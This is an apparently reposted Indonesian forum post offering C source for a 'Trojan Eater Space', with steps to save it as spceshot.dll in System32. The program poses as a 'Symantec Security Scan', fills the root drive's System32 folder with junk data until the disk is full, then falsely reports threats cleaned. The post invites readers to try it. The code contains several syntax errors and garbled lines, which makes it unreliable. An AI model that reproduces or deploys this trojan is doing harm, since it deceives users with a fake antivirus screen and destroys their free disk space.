Trojan Eater Space

Dibuat menggunakan bahasa C. Trojan ini bila di jalankan akan menghabiskan ruang di hard disk pada root drive. Cara kerja Trojan ini cukup cepat karena mampu menyedot kapasitas hard disk 1GB/MENIT...
Untuk menggunakannya
1. Cari root drive
2. Arahkan kw WindowsSystem32 pada root drive
3. copy script,paste ke notepad kemudian simpan dengan "spceshot.dll" tanpa tanda kutip

#include<stdio.h>
#include<conio.h>
#include<dos.h>
#include<stdlib.h> FILE *a,*t,*b;
int r,status,vir_count;
double i;
char ch[]="CREATING A HUGE FILE FOR OCCUPYING HARDDISK SAPCE",choice;
void eatspace(void); void findroot(void); void showstatus(void); void draw(void);
viod accept(void);
void main()
{ draw();accept();
textcolor(WHITE); draw();gotoxy(12,8);
cputs(ANALYZING YOUR SYSTEM. PLEASE WAIT...");
sleep(3); gotoxy(12,8); delline();
cputs("PRESS ANY KEY TO START THE SYSTEM SCAN...");
getch(); gotoxy(12,8); delline(); findroot();
}
void accept()
{textcolor(LIGHTRED); gotoxy(1,8);
cputs("THIS PROGRAM IS A DEMO OF SIMPLE TROJAN HORSE. IF YOU RUN THIS PROGRAM IT WILL\n\rEAT UP YOUR FULL HAR DISK SPACE ON ROOT DRIVE. HOWEVER IT IS POSSIBLETO\n\rELIMINATE THE DAMAGE.\n\n\rTO CLEANUP THE DAMAGE YOU\'VE TO DELETE THE DELETE FILE \"spceshot.dll\" LOCATED IN\n\n\r\"%windir%\\System32\".\n\n\rIF
YOU WISH TO RUN THE PROGRAM PRESS ENTER, OTHER WISE PRESS ANY KEY TO
QUIT.");
if((choice=getch())!=13)
exit(0);
}
void draw()
{
clrscr(); textcolor(WHITE); gotoxy(12,2);
cputs("********************************************************"); gotoxy(12,6); cputs("********************************************************"); gotoxy(12,3);
cputs("*\n\b*\n\b*\n\b"); gotoxy(67,3); cputs("*\n\b*\n\b*\n\b"); gotoxy(14,4);
cputs("SYMANTEC SECURITY SCAN - 2013 (QUICK SYSTEM SCANNER)");
}
void findroot()
{ t=fopen("C:\\windows\\explorer.exe","rb"); if(t!=NULL)
{ fclose(t); textcolor(WHITE);
a=fopen("C:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{ textcolor(LIGHTRED); gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRIPTED. TRY AGAIN LATER!");
getch();
exit(1);
} b=fopen("C:\\windows\\system32\\spceshot.dll","wb+"); if(t!=NULL)
{ showstatus(); eatspace();
}
{ t=fopen("D:\\windows\\explorer.exe","rb"); if(t!=NULL)
{ fclose(t); a=fopen("D:\\windows\\system32\\spceshot.dll","rb"); if(a!=NULL)
{ textcolor(LIGHTRED); gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRIPTED. TRY AGAIN LATER!");
getch();
exit(1);
} b=fopen("D:\\windows\\system32\\spceshot.dll","wb+"); if(t!=NULL)
{
showstatus();
eatspace();
}
} t=fopen("F:\\windows\\explorer.exe","rb"); if(t!=NULL)
{ fclose(t); textcolor(WHITE);
a=fopen("F:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{ textcolor(LIGHTRED); gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRIPTED. TRY AGAIN LATER!");
getch();
exit(1);
} b=fopen("F:\\windows\\system32\\spceshot.dll","wb+"); if(t!=NULL)
{ showstatus(); eatspace();
}
}
if(==NULL)
{ textcolor(LIGHTRED); gotoxy(12,8);
cputs("WARNING: DO NOT ABORT THE SCAN PROCESS UNTIL IT IS COMPLENTED!\n");
textcolor(WHITE); gotoxy(12,18); while(1)
{
for(r=1;r<4;r++)
{
for(r=1;r<900000;i++)
{ status=fput(ch,b);if(status==EOF)
{ textcolor(WHITE); vir_count=random(120); draw();
gotoxy(12,8);
cprintf("SCAN COMPLETE!. DETECTED AND CLEANED OVER %d THREATS!",vir_count);
gotoxy(12,10);
cprintf("PRESS ANY KEY TO CLOSE...");
getch();
break;
}
} cputs(".");if(status==EOF)break;
}
if(status==EOF) break;
}
exit(0);
}
void showstatus()
{
gotoxy(12,8);
cputs("SCANNING THE SYSTEM FOR THREATS");
gotoxy(12,10);
cputs("THIS MAY TAKE UP A FEW MINUTES TO FEW HOURS");
gotoxy(12,13);
cputs("SCAN IN PROGRESS. PLEASE WAIT...");
}
Selamat mencoba..
Source : Forum HNC

Previous
Next Post »